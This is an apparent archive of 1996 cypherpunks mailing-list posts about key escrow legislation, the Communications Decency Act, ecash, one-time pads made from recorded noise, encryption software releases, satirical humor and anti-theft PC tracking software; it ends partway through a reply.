To: merkaba@styx.ios.com
Subject: VENONA PROJECT

http://www.nsa.gov:8080/docs/venona/venona.html

The VENONA Project

In July 1995 the Intelligence Community ended a 50-year silence regarding
one of cryptology's most splendid successes - the VENONA Project. VENONA was
the codename used for the U.S. Signals Intelligence effort to collect and
decrypt the text of Soviet KGB and GRU messages from the 1940's. These
messages provided extraordinary insight into Soviet attempts to infiltrate
the highest levels of the United States Goverment. 

Today, we are proud to offer these exceptional documents on the NSA home
page and we invite you to study and interpret them in the context of
history. NSA will declassify over 2200 messages related to VENONA. We
believe they will not only provide a window into Soviet espionage during the
1940's, but will also give you a glimpse of the important contributions
signals intelligence and cryptographic expertise make to our nation's security.

- - -Ron 

====================================================
"We're all pawns, my dear... your move?" No. 66,

- - --The Prisoner "Arrival"
====================================================














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Mar 1996 15:33:13 -0500
To: cypherpunks@toad.com
Subject: RE: Leahy bill, legalize crypto
Message-ID: <ad6da33d0c0210046762@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:41 PM 3/14/96, Robichaux, Paul E wrote:
>Tim May said:
>>Suppose encryption is allowed, but only with key escrow? [...]
>>And it might pass constitutional muster (for the same reasons the FCC
>>jurisdiction over airwaves and the ban on encryption by ham operators, got
>>approval.
>
>The restriction on using encryption on the ham bands is an outgrowth of the
>world-wide spectrum allocation process. Spectrum's allocated by the
>International Telecommunications Union (ITU); every four years, the World
>Amateur Radio Council (WARC) meets to go over existing allocations.
>Sometimes hams lose (as when the 220MHz band went away) and sometimes they
>win.
>
>The ITU accords were originally signed around WW I, when use of encryption
>on the radio bands was of great concern. The whole licensing system is based
>on the concept of an Amateur Radio _Service_, whose operators are licensed
>by the FCC to use a "public" resource. Said use is restricted by
>international treaties to which the US is a signatory.
>
>The difference here is that the courts have upheld government restrictions
>on broadcast spectrum because it's a scarce resource. In the special case of
>encryption on ham bands, no one's ever even challenged the restriction
>AFAIK. As Duncan Frissell has preached here many times, bandwidth is no
>longer as scarce, so I think a constitutional challenge to an encryption ban
>would probably be workable.

Yes, and I said as much--about the bandwidth limitations--in my post. In
the very next line after you stopped quoting!!!!!:

"Sure, I understand that Internet bandwidth is not the same as the
"public airwaves," but this subtlety may not be enough to stop the parallel
from being successfully drawn. Especially if the phone companies and other
threatened players are pushing hard for the FCC to step in and regulate."

I'm not usually such a quibbler, but it irks me when people stop the
quoting at a certain point, then make the same point made in the elided
section, then say, "But bandwidth is a scarce resource."

Besides which, I think the "scarce resource" argument against crypto over
the airwaves is clearly a fig leaf. Only amateur, non-corporate users are
affected. The intent of the rules, never repealed, seems more of an attempt
to limit the widespread deployment of ham radio for espionage purposes
(e.g., a ham sitting above a harbor area reporting on ship movements).

This is why I said I could see a parallel argument for limiting crypto. And
if other countries are needed to get an international treaty signed, there
will be no shortage of such lap dogs available to do the bidding of the
U.S. The most otherwise-hostile countries to the U.S. will jump at the
chance to impose a worldwide ban on encrypted communications.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 16 Mar 1996 00:34:40 +0800
To: e$@thumper.vmeng.com
Subject: Re: e$ and markets and meta-markets. quote with little comment
Message-ID: <v02120d31ad6e28333c59@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:42 3/14/96, bryce@digicash.com wrote:
>I just thought I would re-print this extract from the recent
>press release regarding the EUNet/Merita ecash roll-out.
>
>
>Favorite phrase: "interesting new possibilities."
>
>
>Follow-ups directed toward e$.  If you post to cpunks without
>Cc'ing me I probably won't see it.
>
>
>
>Bryce
>
>
>******* begin quote from the "companies that accept ecash" section
>
>SOM -- SOM, the Finnish Securities and Derivatives Exchange
>and Clearing House,  established in 1987, serves as a
>neutral integrated securities and derivatives exchange and
>clearing house.  SOM offers real-time financial market
>information on stocks, options and futures via the
>Internet, with invoices payable in ecash. Somtel for
>Windows -the application that offers real-time feed, as
>well as simulation and position-analysis functions-, is
>already available via leased line.
> "The use of money makes stock trading less complicated,
>with money acting as a practical intermediary between the
>transactions." states Asko Schrey, President of SOM.
>"However, since stock trades, as well as the shares
>themselves, are electronic nowadays, this conventional
>transmission of money has actually become a bottleneck and
>a threat to the development of the financial world.
>Therefore, SOM actively participates in projects to promote
>and improve the efficiency of payment traffic. We believe
>that electronic money will offer interesting new
>possibilities."

As mentioned before, one Ecash "currency" per ticker symbol would be a Very
Interesting Possibility. No, I am not aware of any plans by DigiCash to
implement this.



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bruce@omega.co.nz
Date: Thu, 14 Mar 1996 14:16:18 -0500
To: cypherpunks@toad.com
Subject: CD-reading for random keys
In-Reply-To: <4i5gtu$99i@news2.realtime.net>
Message-ID: <4i91h4$lp5@nero.omega.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>Doe anyone know where sample code exists to enable one to read the digital
>stream from an audio CD?  If so, I'd appreciate some pointers to it via
>email.  It seems to me like an Audio Cd would make the perfect one-time

cdgrab (registered) will let you read "frames" (1/75sec of audio) directly into
a wav file. From there it's easy.. But:

>crypto system.  You merely start reading at a specific spot, tossing away
>bytes using a reproducable random number generator, then permuting
>those to form a XOR one time key of any length you want.

The "entropy" or randomness of audio data is LOW. That's why audio compresses
so well. However, the idea of keeping a one-time key on CD-ROM is good. I would
suggest recording thermal noise (Eg the hiss from an untuned FM radio), perhaps
XORing with a pseudo-random sequence to remove residual bias. Record 600M of
this onto a pair of writable CDs, and have your friend come and collect one of
them personally. Then you can send up to 600M of totally secure data before you
dispose of the disks (Microwave oven is fun :) and write a new pair.

--
                                  bruce@omega.co.nz            .-'~~~-.
                                  Fax: +64 7 847-5513        .'o  oOOOo`.
                                  Voice: NISTIM0L0C         :~~~-.oOo   o`.
 Fight Elected Dictatorship       PGP key available at:      `. \ ~-.  oOOo.
                                  pgp-public-keys@keys.pgp.net `.; / ~.  OO:
                                  2001/009734B1 or             .'  ;-- `.o.'
     SPLIT YOUR VOTE!             1024/842510D9               ,'  ; ~~--'~
                                    \|/                      ;   ;
                                ____\|//_______\|/________\\;_\\//___\|/___




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Mar 1996 01:27:06 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <m0txJBF-00091sC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:57 AM 3/14/96 +0000, Deranged Mutant wrote:
>On 13 Mar 96 at 15:27, jim bell wrote:


>[..]
>> If I were trying to detect government investigation in such a situation, I 
>> would buy a crypto phone, open an "escrow account" on a totally voluntary 
>> basis, give them a phony key, and then (as part of the 
>(presumably?)  [..]
>
>Would it be legal to deceive an escrow agent?

It _should_ be legal.  At least, assuming the arrangement is truly voluntary 
and the escrow agent gets his part of the bargain (his usual fee) he has no 
interest in knowing whether or not the data he's holding for you is "real" 
or "imaginary."  

The problem is, the government could easily start trying to control and 
limit the "voluntariness" of this arrangement, as I've now just been told 
they intend to do:  Yes, the bill specifically wants the key escrow agent to 
NOT tell the key holder if his key has been compromised.  In my opinion, 
this totally destroys the illusion that this agreement is "voluntary," and 
makes me question any other "feel-good" component of this bill.

It is sections of the bill like that which will guarantee that nobody 
provides an unencrypted key for escrow:  Nobody will want to risk having the 
escrow agent "forced" to release the key, even (and especially!) under a 
court order.  Fortunately, modern technology will provide the solution to 
government-simpleton thinking.


Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 14 Mar 1996 14:13:46 -0500
To: e$@thumper.vmeng.com, cypherpunks@toad.com
Subject: e$ and markets and meta-markets. quote with little comment
Message-ID: <199603141142.MAA16076@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



I just thought I would re-print this extract from the recent
press release regarding the EUNet/Merita ecash roll-out.


Favorite phrase: "interesting new possibilities."


Follow-ups directed toward e$.  If you post to cpunks without
Cc'ing me I probably won't see it.



Bryce


******* begin quote from the "companies that accept ecash" section

SOM -- SOM, the Finnish Securities and Derivatives Exchange
and Clearing House,  established in 1987, serves as a 
neutral integrated securities and derivatives exchange and 
clearing house.  SOM offers real-time financial market 
information on stocks, options and futures via the 
Internet, with invoices payable in ecash. Somtel for 
Windows -the application that offers real-time feed, as 
well as simulation and position-analysis functions-, is 
already available via leased line.
 "The use of money makes stock trading less complicated, 
with money acting as a practical intermediary between the 
transactions." states Asko Schrey, President of SOM. 
"However, since stock trades, as well as the shares 
themselves, are electronic nowadays, this conventional 
transmission of money has actually become a bottleneck and 
a threat to the development of the financial world. 
Therefore, SOM actively participates in projects to promote 
and improve the efficiency of payment traffic. We believe 
that electronic money will offer interesting new 
possibilities."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Mar 1996 01:26:59 +0800
To: cypherpunks@toad.com
Subject: RE: Leahy bill, legalize crypto
Message-ID: <m0txL0j-00091GC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 3/14/96 -0800, Timothy C. May wrote:
>At 2:41 PM 3/14/96, Robichaux, Paul E wrote:

>>The difference here is that the courts have upheld government restrictions
>>on broadcast spectrum because it's a scarce resource. In the special case of
>>encryption on ham bands, no one's ever even challenged the restriction
>>AFAIK. As Duncan Frissell has preached here many times, bandwidth is no
>>longer as scarce, so I think a constitutional challenge to an encryption ban
>>would probably be workable.
>
>Yes, and I said as much--about the bandwidth limitations--in my post. In
>the very next line after you stopped quoting!!!!!:
>
>"Sure, I understand that Internet bandwidth is not the same as the
>"public airwaves," but this subtlety may not be enough to stop the parallel
>from being successfully drawn. Especially if the phone companies and other
>threatened players are pushing hard for the FCC to step in and regulate."

I think your analysis is absolutely correct.  Despite the fact that fiber 
bandwidth has none of the limitations  of "over the air" communications, the 
government will try to regulate it as if it were.  The underlying danger of 
the CDA, in addition to regulating CONTENT, is that the government is 
setting up precedents to regulate the communications AT ALL, which is 
dangerous to us.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Thu, 14 Mar 1996 11:44:52 -0500
To: cypherpunks@toad.com
Subject: Stealth for Mac?
Message-ID: <Pine.3.89.9603141458.A4594-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



I've had a request from someone for a copy of Stealth that can run on a
Mac (I have the README for the DOS/Unix version on my Web site). Has
anyone ported it? Or if not, would anyone be able to? You should be able
to just hack up a simple GUI around the main filter code to select input 
and output files. 

	Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Fri, 15 Mar 1996 12:40:36 +0800
To: "'cypherpunks@toad.com>
Subject: (Humor)  FW:  How to Win Arguments
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960314223848Z-3429@red-05-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



<<forwards deleted>>

I argue very well. Ask any of my remaining friends. I can win an
argument on any topic, against any opponent.  People know this, and
steer clear of me at parties.  Often, as a sign of their great
respect, they don't even invite me.  You too can win arguments.
Simply follow these rules:

        * Drink Liquor.

Suppose you're at a party and some hotshot intellectual is expounding on
the economy of Peru, a subject you know nothing about.  If you're
drinking some health-fanatic drink like grapefruit juice, you'll hang
back, afraid to display your ignorance, while the hotshot enthralls your
date.  But if you drink several large martinis, you'll discover you have
STRONG VIEWS about the Peruvian economy.  You'll be a WEALTH of
information.  You'll argue forcefully, offering searing insights
and possibly upsetting furniture.  People will be impressed.  Some may
leave the room.

        * Make things up.

Suppose, in the Peruvian economy argument, you are trying to prove
Peruvians are underpaid, a position you base solely on the fact that YOU
are underpaid, and you're damned if you're going to let a bunch of
Peruvians be better off.  DON'T say: "I think Peruvians are underpaid." 
Say: "The average Peruvian's salary in 1981 dollars adjusted for the
revised tax base is $1,452.81 per annum, which is $836.07 before the
mean gross poverty level."

        NOTE: Always make up exact figures.
        
If an opponent asks you where you got your information, make THAT up,
too.  Say: "This information comes from Dr. Hovel T. Moon's study for
the Buford Commission published May 9, 1982.  Didn't you read it?" Say
this in the same tone of voice you would use to say "You left your
soiled underwear in my bath house."

        * Use meaningless but weightly-sounding words and phrases.

        Memorize this list:

                Let me put it this way
                In terms of
                Vis-a-vis
                Per se
                As it were
                Qua
                So to speak

You should also memorize some Latin abbreviations such as "Q.E.D.,"
"e.g.," and "i.e."  These are all short for "I speak Latin, and you do
not."

Here's how to use these words and phrases.  Suppose you want to say:
"Peruvians would like to order appetizers more often, but they don't
have enough money."

You never win arguments talking like that.  But you WILL win if you say:
"Let me put it this way.  In terms of appetizers vis-a-vis Peruvians qua
Peruvians, they would like to order them more often, so to speak, but
they do not have enough money per se, as it were. Q.E.D."

Only a fool would challenge that statement.

        * Use snappy and irrelevant comebacks.

You need an arsenal of all-purpose irrelevent phrases to fire back at
your opponents when they make valid points.  The best are:

        You're begging the question.
        You're being defensive.
        Don't compare apples and oranges.
        What are your parameters?

This last one is especially valuable.  Nobody, other than
mathematicians, has the vaguest idea what "parameters" means.

Here's how to use your comebacks:

        You say                 	As Abraham Lincoln said in 1873...
        Your opponents says     	Lincoln died in 1865.
        You say                 	Your begging the question.

                             OR
                                        
        You say                 	Liberians, like most Asians...
        Your opponents says     	Liberia is in Africa.
        You say                 	You're being defensive.

        * Compare your opponent to Adolf Hitler.

This is your heavy artillery, for when your opponent is obviously right
and you are spectacularly wrong. Bring Hitler up subtly. Say:  "That
sounds suspiciously like something Adolf Hitler might say" or "You
certainly do remind me of Adolf Hitler."

So that's it: you now know how to out-argue anybody.  Do not try to pull
any of this on people who generally carry weapons.

-------------------------------------------
End Forwarded Article




       ..
~ Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 15 Mar 1996 12:27:52 +0800
To: cypherpunks@toad.com
Subject: Re: CD-reading for random keys
Message-ID: <960314142759_168531295@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-14 08:34:57 EST, you write:

>I would
>suggest recording thermal noise (Eg the hiss from an untuned FM radio),
>perhaps XORing with a pseudo-random sequence to remove residual bias. 

XORing 2 or independent thermal noise sources together would be even better.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sat, 16 Mar 1996 00:30:48 +0800
To: cypherpunks@toad.com
Subject: Re: recent ( 3 months ) software developements?
Message-ID: <199603141949.OAA05238@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

gjeffers@ns.htc.net (Gary Lee Jeffers) wrote:
>Dear Cypherpunks,
>
>   Due to really lousey circumstances, I have been unable to monitor my
>mail for the last 3 months. Also, last 3 months mail currently unavailble
>to me. I am interested in finding out if there have been any new soft-
>ware offerings or software upgrades in that time. My particular interest
>is Dos/Windows. Also, locations where software can be downloaded. Note
>that a brief description of recent software developements maybe helpful
>to other Cypherpunks with little time to monitor Cypherpunks list.
>
>                                                   Beat State,
>                                                   Gary Jeffers
>

I released version 2.0 of Puffer, my symmetric encryption program for Windows last 
month.  The exportable shareware version (40-bit RC4, uh, I mean PC1) is available 
from my web site (http://execpc.com/~kbriggs).  The registered version uses 160-bit 
Blowfish.  Both versions have a secure wipe feature and a built-in editor for 
on-the-fly e-mail encryption.

Kent


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUh4QioZzwIn1bdtAQGUDQF+OlQQTGvyfuzAJahBAXIc09V82QDc4IGj
3TUEyrU8Y9n0GAEWwZw+mDRaSSEXbqlc
=7HdD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Mar 1996 12:30:12 +0800
To: cypherpunks@toad.com
Subject: CONGRESS: Online Parental Control Act of 1996
Message-ID: <199603142300.PAA24652@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 14 Mar 1996 14:21:53 -0800 (PST)
Precedence: bulk
From: telstar@wired.com (--Todd Lappin-->)
To: Multiple recipients of list <cda96-l@willamette.edu>
Subject: CONGRESS: Online Parental Control Act of 1996

Today in the House of Representatives, legislation was introduced to
encourage parental empowerment on the Internet and eliminate the vague and
overbroad "indecency" standard that became law under the Communications
Decency Act.

The new legislation, called the "Online Parental Control Act of 1996," was
introduced by Rep. Anna Eshoo (D-CA), whose district includes much of
California's Silicon Valley.  Representatives Pelosi (D-CA), Dellums
(D-CA), Farr (D-CA), Gejdenson (D-CT), and Woolsey (D-CA) are co-sponsors
of the bill.

(The full text of Rep. Eschoo's press release on the new legislation
follows below.)

The Online Parental Control Act of 1996 seeks to replace the "indecency"
standard (which is mainly used to regulate speech in BROADCAST media) with
the more narrowly-drawn "harmful to minors" standard which has already been
upheld as constitutional in 48 states.

My understanding is that "harmful to minors" is a PRINT-based standard, but
I'll research this and send out a more detailed evaluation as soon as
possible. In the meantime, I can say this: "harmful to minors" is viewed as
a middle-of-the-road standard, and as such, it remains *highly*
controversial. There are many who would argue that *any* attempt to
restrict access to content other than obscenity (which does not enjoy First
Amendment protection) is unwarranted.

Stay tuned.

All of this, by the way, comes on the heels of a bill (S 1567) Patrick
Leahy introduced in the United States Senate last month in an effort to
repeal the Communications Decency Act altogether.

Spread the word!

--Todd Lappin-->
Section Editor
WIRED Magazine

============================================================

FOR IMMEDIATE RELEASE
Lewis Roth
CONTACT: (202) 225-8104
March 14, 1996

Eshoo Introduces Online Parental Control Act
Legislation Strengthens Parental Control Of Online Materials,
Eliminates "Indecency" Standard

Washington, D.C.--Rep. Anna Eshoo (D-CA) today introduced the Online
Parental Control Act of 1996 (OPCA) to strengthen the control parents
have over their children's access to online materials, eliminate the
"indecency" standard from the Communications Act of 1934, and provide
additional defenses against liability for publishing online materials.
Representatives Pelosi (D-CA), Dellums (D-CA), Farr (D-CA), Gejdenson
(D-CT), and Woolsey (D-CA) are original cosponsors of OPCA.

When the Telecommunications Reform Bill was signed into law earlier
this year, it made sweeping changes to America's telecommunications
policy.  Among those changes was the establishment of a ban on using
telecommunications devices to provide "indecent" materials to minors, as
well as defenses against being held liable for a violation of that ban.  For
example, people could avoid liability by using software that blocks the
access of minors to such materials or restricts access through the use
of credit card numbers or adult access codes.  Some U.S.
Representatives, including Rep. Eshoo, opposed the "indecency"
standard because the range of material it would ban was so broad that it
violates the right to freedom of speech.

The "indecency" standard is currently being challenged in court by a
large coalition of free speech advocacy groups and high technology
companies.

"The Online Parental Control Act will encourage an open dialogue in
Congress about the best way to both give parents control over what
their children see online and protect the First Amendment rights of
Internet users," said Rep. Eshoo.  "My proposal builds on last year's
efforts to reach a compromise on this issue by offering more incentives
for the online community to provide families with better parental control
technologies.

"I'm supportive of efforts to address this issue in the courts, but I believe
Congress also needs to offer a legislative solution.  Given the political
realities of the current Congress, I think OPCA offers the most realistic
way to settle this dispute in a timely and effective manner."

The Online Parental Control Act of 1996:

        Replaces the "indecency" standard with a "harmful to minors"
standard;
        Establishes a definition for "harmful to minors;"
        Maintains the Communications Act of 1934's legal defenses
against liability for people who choose to give parents technology that: 1)
blocks or restricts access to online materials deemed obscene or harmful
to minors, and 2) restricts access to such materials through adult access
codes or credit card numbers;
        Adds two new defenses: 1) the use of labeling or segregating
systems to restrict access to online materials, such as systems
developed using the standards designed by the Platform for Internet
Content Selection project (PICS), and 2) the use of other systems that
serve the same function of the other defenses if they are as reasonable,
effective, and appropriate as blocking, adult access code, and labeling
technologies; and
        Protects providers or users of interactive computer services,
information content providers, and access software providers from civil
or criminal liability under state law for making available to minors materials
that are indecent or harmful to minors if they take actions to qualify for
the defenses mentioned above.

"I'd rather have Mom and Dad monitoring their children's online viewing
habits than the government," concluded Rep. Eshoo.  "Technology offers
the best opportunity for parents to manage what their kids have access
to, and the Online Parental Control Act encourages those technologies to
be developed more fully."

The "indecency" standard is a vague term that has been subject to legal
challenge by a wide range of free speech advocates and high
technology companies.  The broad nature of the "indecency" standard
means that it could lead to a prohibition on material such as classic art
like Michelangelo's David, classic literature like "Catcher In The Rye," and
frank discussions about birth control, sexuality, or disease transmission.
"Harmful to minors," on the other hand, already works successfully in 48
states, more directly addresses speech that actually harms children, and
passes constitutional muster.

PICS is a cross-industry working group assembled under the auspices of
MIT's World Wide Web Consortium to develop an easy-to-use content
labeling and selection platform that empowers people worldwide to
selectively control online content they receive through personal
computers.  The Recreational Software Advisory Council recently
announced that it will soon implement a detailed voluntary ratings system,
using PICS standards, that will let computer users filter out varying
degrees of sex, violence, nudity, and foul language.  Companies and
groups supporting PICS include Apple, America Online, AT&T, the Center
for Democracy and Technology, CompuServe, IBM, France Telecom,
Prodigy, Providence Systems/Parental Guidance, Surf Watch Software,
and Time Warner Pathfinder.

For more information about the Online Parental Control Act of 1996,
please contact Lewis Roth at (202) 225-8104 or look on the Internet at
http://www-eshoo.house.gov/opca.html.

###

+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+-
This transmission was brought to you by....

        THE CDA INFORMATION NETWORK

The CDA Information Network is a moderated mailing list providing
up-to-the-minute bulletins and background on efforts to overturn the
Communications Decency Act.  To subscribe, send email to
<majordomo@wired.com> with "subscribe cda-bulletin" in the message body.

WARNING: This is not a test!            WARNING: This is not a drill!
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+-









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 14 Mar 1996 09:23:00 -0500
To: cypherpunks@toad.com
Subject: Re: How's that again?
Message-ID: <199603141404.PAA14993@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



adam@lighthouse.homeport.org writes:

| I disagree with your thoughts, and find you annoying and
| unwilling to answer substantitive questions raised about your plans.
| Furthermore, most of your posts are way too long.

Your posts more annoying, and too short.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Mar 1996 12:03:15 +0800
To: cypherpunks@toad.com
Subject: SCHWA - New Web Search Engine!!
Message-ID: <2.2.32.19960314230647.0089dfc0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Something of interest...

>X-Www-Page: http://www.fringeware.com/MSG/index.html#digest
>Keywords: pleashes heorg horizona disabili freques inspecurs 
>Subject: SCHWA - New Web Search Engine!!
>Reply-To: Troy.Sheets@Eng.Sun.COM (Troy Sheets)
>Date: Tue, 12 Mar 1996 09:47:27 -0800
>Apparently-To: fwlist-daily@fringeware.com
>X-UIDL: 70f914736d382f472d2b9d22d8a07327
>
>Sent from: Troy.Sheets@Eng.Sun.COM (Troy Sheets)
>
>The Schwa Corperation, Global Media and Infomation Services is proud
>to present "Intrude", the search engine for the next century.  Intrude
>is working 24 hours a day, sucking infomation and carefully indexing
>data from all four corners of the global infosphere.  Sure, other
>search engines scan Usenet and mailing list archeives... but Intrude
>goes even further.  Using the powerful parallel-processing supercomputer,
>"Pal 4000" (courtesy of Schwa Microsystems Computer Corperation), Intrude
>reads credit ratings, cable TV viewing habits, mail-order products received,
>videos rented, parking tickets received, and of course, every single
>peice of email transmitted over the Internet.  Tired of those pesky
>PGP messages?  They are no match for Pal's Reverse Escrow Orthoganal
>decryption software.  
>
>But don't feel bad about knowing that everything you ever said online
>is now available to any crazy with a 14.4, all search querries on Intrude
>are logged also... so you can always Intrude the person Intruding on you.
>
>Try Intrude today, and see what juice facts it pulls up.  You might learn
>things about yourself you never knew!
>
>"The Schwa Corperation, making information work harder... and harder
>infomation to work... or working infomation hard"
>
>-Troy Sheets, VP of Marketing, GMIS.
>
>http://www-scf.usc.edu/~tsheets
>
>
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 15 Mar 1996 12:10:21 +0800
To: cypherpunks@toad.com
Subject: Re:LACC: PC Phones Home?
Message-ID: <m0txN0U-00094xC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:41 PM 3/13/96 -0800, Jim McCoy wrote:
>Dennis Hilliard writes:
>>
>>"Software to the rescue:
>>If somoeone steals your PC, you may be able to get it back because of
>>software that acts as a kind of tracking device. Home Office Computing
>>magazine reports that the software CompuTrace TRS will automatically dial
>>the office of its creator, Absolute Software, if a thief hooks up a stolen
>>PC's modem to a phone line. The software reveals the location of the PC and
>>Absolute Software will call the police" - Providence Journal-Bulletin -
>>March 12, 1996.

>1- How does the PC know where it is?
>2- How does the PC know it has been stolen?
>
>Since this is a software product I am assuming that the answer to #1
>is the use of CallerID on the line when the software calls, which is
>defeated by the use of line blocking by the thief. 

I think that 1-800 services provide caller ID information to the company or 
organization that pays for the service.  Whether or not this is blocked by 
standard caller-ID I don't know.   Nevertheless, like you, I am not 
impressed with the likelihood of success of this system.

> The obvious answer
>to #2 seems to me to have the system call the CompuTrace office at
>odd intervals to see if it has been reported stolen yet...

One thing that might be useful would be a OTP (one-time programmable) EPROM 
chip installed on all major system components (monitor, HD, motherboard, 
CDROM drive, maybe even DRAM SIMMs).  It would be a serial device for low 
cost, such as a 3-pin TO-92 chip, which would have a capacity of about 4k 
bits, enough to store a hash of the owner-history (at about 100 bits per 
owner) for any owner that decided to leave a record. Like an EPROM, bits 
could only be written once; the chip itself would prevent write-overs 
previous to the last-written bit. 

Subsequent owners could read the history and publish the hash codes; anyone 
looking for such a stolen product could have their losses checked 
automatically, and perhaps semi-anonymously or anonymously, by a service set 
up to do this.  Innocent owners could be adequately compensated for finding 
a piece of stolen hardware, to the extent that nobody is deterred about 
reporting a find.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Fri, 15 Mar 1996 12:21:53 +0800
To: cypherpunks <kelli@zeus.towson.edu>
Subject: [HUMOR] SCHWA - New Web Search Engine!! (fwd)
Message-ID: <Pine.SUN.3.91.960314162829.8917B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


I thought this was rather amusing... it's labeled as humor, so maybe 
people won't flame me for posting it... :)

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.

---------- Forwarded message ----------
Date: Tue, 12 Mar 1996 09:47:27 -0800
From: FringeWare Daily <email@fringeware.com>
Subject: SCHWA - New Web Search Engine!!

Sent from: Troy.Sheets@Eng.Sun.COM (Troy Sheets)

The Schwa Corperation, Global Media and Infomation Services is proud
to present "Intrude", the search engine for the next century.  Intrude
is working 24 hours a day, sucking infomation and carefully indexing
data from all four corners of the global infosphere.  Sure, other
search engines scan Usenet and mailing list archeives... but Intrude
goes even further.  Using the powerful parallel-processing supercomputer,
"Pal 4000" (courtesy of Schwa Microsystems Computer Corperation), Intrude
reads credit ratings, cable TV viewing habits, mail-order products received,
videos rented, parking tickets received, and of course, every single
peice of email transmitted over the Internet.  Tired of those pesky
PGP messages?  They are no match for Pal's Reverse Escrow Orthoganal
decryption software.  

But don't feel bad about knowing that everything you ever said online
is now available to any crazy with a 14.4, all search querries on Intrude
are logged also... so you can always Intrude the person Intruding on you.

Try Intrude today, and see what juice facts it pulls up.  You might learn
things about yourself you never knew!

"The Schwa Corperation, making information work harder... and harder
infomation to work... or working infomation hard"

-Troy Sheets, VP of Marketing, GMIS.

http://www-scf.usc.edu/~tsheets






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 15 Mar 1996 11:58:08 +0800
To: cypherpunks@toad.com
Subject: Re:LACC: PC Phones Home?
In-Reply-To: <v02140b01ad6d4363168b@[199.2.22.124]>
Message-ID: <Pine.LNX.3.91.960314171412.421A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Mar 1996, Jim McCoy wrote:

> A few questions:
> 
> 1- How does the PC know where it is?
> 2- How does the PC know it has been stolen?
> 
> Since this is a software product I am assuming that the answer to #1
> is the use of CallerID on the line when the software calls, which is
> defeated by the use of line blocking by the thief.  The obvious answer
